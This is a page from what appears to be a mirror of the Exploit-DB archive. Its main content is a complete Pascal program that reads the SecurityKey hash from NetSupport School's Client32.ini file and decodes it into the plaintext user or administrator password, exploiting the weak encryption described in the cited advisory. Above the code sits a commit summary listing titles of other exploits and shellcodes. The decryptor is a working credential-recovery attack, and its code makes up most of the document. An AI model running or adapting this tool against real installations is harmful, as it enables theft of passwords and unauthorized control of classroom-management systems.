bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/linux/local/23882.pas
Offensive Security 880bbe402e DB: 2019-03-08 
14991 changes to exploits/shellcodes

HTC Touch - vCard over IP Denial of Service

TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities

PeerBlock 1.1 - Blue Screen of Death

WS10 Data Server - SCADA Overflow (PoC)

Symantec Endpoint Protection 12.1.4013 - Service Disabling
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow

man-db 2.4.1 - 'open_cat_stream()' Local uid=man

CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation

CDRecord's ReadCD - Local Privilege Escalation
Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH)
FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)

CCProxy 6.2 - 'ping' Remote Buffer Overflow

Savant Web Server 3.1 - Remote Buffer Overflow (2)

Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow
QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit)
Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit)
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)
Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass)
TeamCity < 9.0.2 - Disabled Registration Bypass
OpenSSH SCP Client - Write Arbitrary Files
Kados R10 GreenBee - Multiple SQL Injection
WordPress Core 5.0 - Remote Code Execution
phpBB 3.2.3  - Remote Code Execution

Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
2019-03-08 05:01:50 +00:00

155 lines
No EOL
3.7 KiB
ObjectPascal
Raw Blame History

source: https://www.securityfocus.com/bid/9981/info
NetSupport School is prone to a password-encryption vulnerability because the application fails to protect passwords with a sufficiently effective encryption scheme.
Exploiting this issue may allow an attacker to access user and administrator passwords for the affected application.
program name;
uses crt;
var i,j,length,x,y,crazy:integer;
passfile:text;
line:string;
password,p:array [1..100] of char;
known,convert:array [1..26,1..3] of char;
ch,tempx,tempy,key:char;
procedure conv;
begin
convert[1,1]:='E';
convert[1,2]:='M';
convert[1,3]:='A';
for i:=2 to 26 do begin
if convert[i-1,2]='P' then begin
convert[i,1]:=chr(ord(convert[i-1,1])+1);
convert[i,2]:='A';
end
else begin
convert[i,1]:=convert[i-1,1];
convert[i,2]:=chr(ord(convert[i-1,2])+1);
end;
convert[i,3]:=chr(ord(convert[i-1,3])+1);
end;
end;
procedure hex(a,b:char; num:integer);
begin
if num>0 then begin
for i:=1 to num do begin
if b='P' then begin
b:='A';
a:=chr(ord(a)+1);
end else inc(b);
end;
end;
if num<0 then begin
for i:=-1 downto num do begin
if b='A' then begin
b:='P';
a:=chr(ord(a)-1);
end else dec(b);
end;
end;
tempx:=a;
tempy:=b;
end;
function compare(a,b:char):char;
begin
for i:=1 to 26 do begin
if (a=convert[i,1])and(b=convert[i,2]) then compare:=chr(i+64);
end;
end;
function diff(a,b,c,d:char):integer;
var num1,num2,num3:integer;
begin
num1:=ord(a)*16+ord(b);
num2:=ord(c)*16+ord(d);
num2:=num2;
diff:=num2-num1;
end;
Begin
{get the hash from client32.ini}
clrscr;
Writeln(' _________________________________________________________');
Writeln('|NetSupport School Pro Password decryptor |');
Writeln('|Credits goto: Drexel University, Harry Hoffman, Mr. Flynn|');
Writeln('|and my wonderful fiance Halley |');
Writeln(' ---------------------------------------------------------');
Writeln('');
assign (passfile,'C:\Progra~1\NetSup~1\Client32.ini');
reset (passfile);
i:=0;
while not eof(passfile) do
begin
line:='';
while not EoLn(passfile) do
begin
Read(passfile, ch);
line:=line+ch;
if line='SecurityKey=' then begin
while not eoln(passfile) do
begin
inc(i);
read(passfile,ch);
password[i]:=ch;
end;
length:=i;
end;
end;
readln(passfile,line);
end;
write('Hash: ');
for i:=1 to length do write(password[i]);
writeln('');
{decrypt the hash}
conv;
known[1,1]:='E';
known[1,2]:='M';
known[2,1]:='9';
known[2,2]:='O';
known[3,1]:='>';
known[3,2]:='A';
known[4,1]:='B';
known[4,2]:='C';
known[5,1]:='F';
known[5,2]:='E';
known[6,1]:=':';
known[6,2]:='G';
known[7,1]:='>';
known[7,2]:='I';
known[8,1]:='B';
known[8,2]:='K';
known[9,1]:='F';
known[9,2]:='M';
known[10,1]:=':';
known[10,2]:='O';
known[11,1]:='?';
known[11,2]:='A';
known[12,1]:='C';
known[12,2]:='C';
known[13,1]:='G';
known[13,2]:='E';
known[14,1]:=';';
known[14,2]:='G';
known[15,1]:='?';
known[15,2]:='I';
{get the first char}
for i:=1 to round(length/2) do p[i]:=chr(65);
for x:=1 to round(length/2) do begin
crazy:=0;
crazy:=-(round(length/2))+x;
for y:=1 to round(length/2) do crazy:=crazy-(ord(p[y])-65);
hex(password[x*2-1],password[x*2],crazy);
p[x]:=chr(diff(known[x,1],known[x,2],tempx,tempy)+65);
end;
writeln('');
write('Password: ');
for i:=1 to round(length/2) do begin
write(p[i]);
end;
readkey;
end.
Reference in a new issue View git blame Copy permalink